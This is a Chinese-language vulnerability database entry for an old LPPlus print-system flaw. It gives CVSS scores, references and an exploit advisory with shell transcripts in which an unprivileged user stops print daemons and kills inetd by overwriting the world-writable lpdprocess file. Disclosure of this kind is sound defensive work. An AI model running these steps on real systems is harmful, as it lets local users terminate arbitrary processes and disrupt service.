发布时间 :2000-11-14 00:00:00
修订时间 :2008-09-05 16:22:06

[原文]LPPlus creates the lpdprocess file with world-writeable permissions, which allows local users to kill arbitrary processes by specifying an alternate process ID and using the setuid dcclpdshut program to kill the process that was specified in the lpdprocess file.


        LPPlus创建带有全域可写权限的lpdprocess文件。本地用户通过指明交替的进程ID且使用setuid dcclpdshut程序中断lpdprocess文件中指定的进程从而中断任意进程。

- CVSS (基础分值)

CVSS分值: 3.6 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  XF  lpplus-process-perms-dos
(VENDOR_ADVISORY)  BUGTRAQ  20000906 Multiple Security Holes in LPPlus

- 漏洞信息

低危 访问验证错误
2000-11-14 00:00:00 2005-10-20 00:00:00
        LPPlus创建带有全域可写权限的lpdprocess文件。本地用户通过指明交替的进程ID且使用setuid dcclpdshut程序中断lpdprocess文件中指定的进程从而中断任意进程。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at:

- 漏洞信息 (20192)

LPPlus 3.2.2/3.3 Permissions DoS Vulnerabilities (EDBID:20192)
unix local
2000-09-06 Verified
0 Dixie Flatline
N/A [点击下载]

Vulnerability #1: Several files that are part of the LPPlus print management system are installed setuid root by default. These files include:


These start the scheduler, LPD server and network status daemons.


These stop the same services.

By default, all six may be run by a user of any privilege level, allowing any user to start and stop printing services, regardless of userid or group.

Vulnerability #2: $LPHOME/system/lpdprocess is created mode 777. This file contains the process ID of the dcclpdser process. If a user replaces the PID in $LPHOME/system/lpdprocess with the PID of a target process, then runs $LPHOME/bin/dcclpdshut, the combination of this file's permissions, and the fact that dcclpdshut is executable by any user, allows any user to send signal 2 (SIGINT) to, thereby shutting down, any process.

Vulnerability #1: 

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep dcc
test 26357 26351 0 18:18:06 pts/0 0:00 grep dcc
root 26262 1 0 17:41:50 ? 0:01 /opt/lpplus/bin/dccsched
root 26272 1 0 17:42:03 ? 0:00 /opt/lpplus/bin/dcclpdser
root 26276 1 0 17:42:14 ? 0:00 /opt/lpplus/bin/dccbkst
$ dccbkstshut
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ dccshut
LPP054I LP Plus scheduler ordered to shutdown.
$ ps -ef|grep dcc 
test 26253 26239 0 17:39:45 pts/0 0:00 grep dcc 

Vulnerability #2

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep inet
test 26285 26279 0 17:42:42 pts/0 0:00 grep inet
root 12276 1 0 Aug 22 ? 0:00 /usr/sbin/inetd -s
$ cat > $LPHOME/system/lpdprocess
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ ps -ef|grep inet
test 26291 26279 0 17:45:17 pts/0 0:00 grep inet

- 漏洞信息

LPPlus lpdprocess File Permission Weakness Arbitrary Process Termination
Local Access Required Denial of Service
Loss of Availability Solution Unknown
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-09-06 Unknow
Unknow Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete